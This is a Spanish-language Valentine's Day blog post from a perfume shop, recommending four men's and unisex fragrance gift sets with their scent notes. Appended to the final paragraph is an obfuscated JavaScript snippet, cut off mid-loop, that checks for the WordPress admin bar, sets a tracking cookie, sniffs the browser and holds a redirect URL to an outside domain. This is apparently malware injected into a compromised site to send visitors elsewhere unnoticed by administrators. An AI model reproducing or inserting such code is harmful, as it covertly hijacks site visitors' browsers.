blog san valentin (1)

 

 

En plena semana del amor y a pocos días de San Valentín hoy queremos ayudar a las más despistadas a encontrar el perfume de hombre ideal para nuestro enamorado.

Aún estas a tiempo de tener un detalle con tu amor y que mejor manera que a través de un perfume.

Te presentamos la selección de cofres de perfumes para regalar que desde Perfumes Tin Tin hemos preparado para que tu regalo no pase inadvertido.

Invictus de Paco Rabanne no te decepcionará, el cofre incluye además del perfume en 100 ml, el desodorante de 150 ml lo que hará que combinado sea el combo perfecto. Un perfume de hombre en el que Paco Rabanne nos sugiere a través de su frescura y sensualidad una representación del hombre actual. Invictus se convierte en un choque de mundos: por un lado sus frescas notas de salida entre las que se encuentra el pomelo frente al polisendro de fondo.

perfume invictus

 

 

 

 

 

 

 

 

 

 

 

Valentino Uomo de Valentino Perfumes un perfume de hombre que se distingue por su elegancia en sus notas de bergamota y su sorprendente toque especiado. Con un ligero aroma de mirto, desprende atrevidas notas de café y un toque reluciente de crema de gianduia, creando una combinación excitante y memorable. Encierra los matices envolventes del almizcle propio del cuero blanco que libera todo el esplendor del cedro. El cofre contiene el perfume en eau de toliette de 100 ml y un after shave balm de 100 ml.

perfume valentino uomo

 

 

 

 

 

 

 

 

 

 

 

 

Un clásico entre los perfumes de hombre es Armani Code de Giorgio Armani. Pensado para el hombre ideal que seduce con sus buenos modales y elegancia. Sus notas cítricas de salida: bergamota y limón siciliano. Como notas de fondo: cuero, tabaco, haba tonka y madera de guaiac. Aprovecha este cofre que incluye el perfume en su versión Eau de Toilette de 75 ml y el desodorante en stick de 75 ml también.

perfume armani code

 

 

 

 

 

 

 

 

 

 

 

 

Para terminar ¿qué tal un perfume que podáis utilizar los dos? Calvin Klein nos trae el perfume unisex por excelencia CK One. Un perfume que ha marcado tendencia desde su lanzamiento en 1994 creada por las narices Alberto Morillas y Harry Fremont.

perfume ck one

 

 

 

 

 

 

 

 

 

 

 

 

Las notas de salida de CK One de Calvin Klein son de cardamomo, piña, papaya, mandarina y limón; las notas de corazón de lirio, nuez moscada, jazmín, violeta y rosa; y las notas de fondo de musgo de roble, ámbar, sándalo, almizcle y cedro.

CK One es una fragancia simple, accesible, minimalista, fresca y ligera ideal para su uso diario.

¿Qué os parece la idea de compartir perfume con tu pareja? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone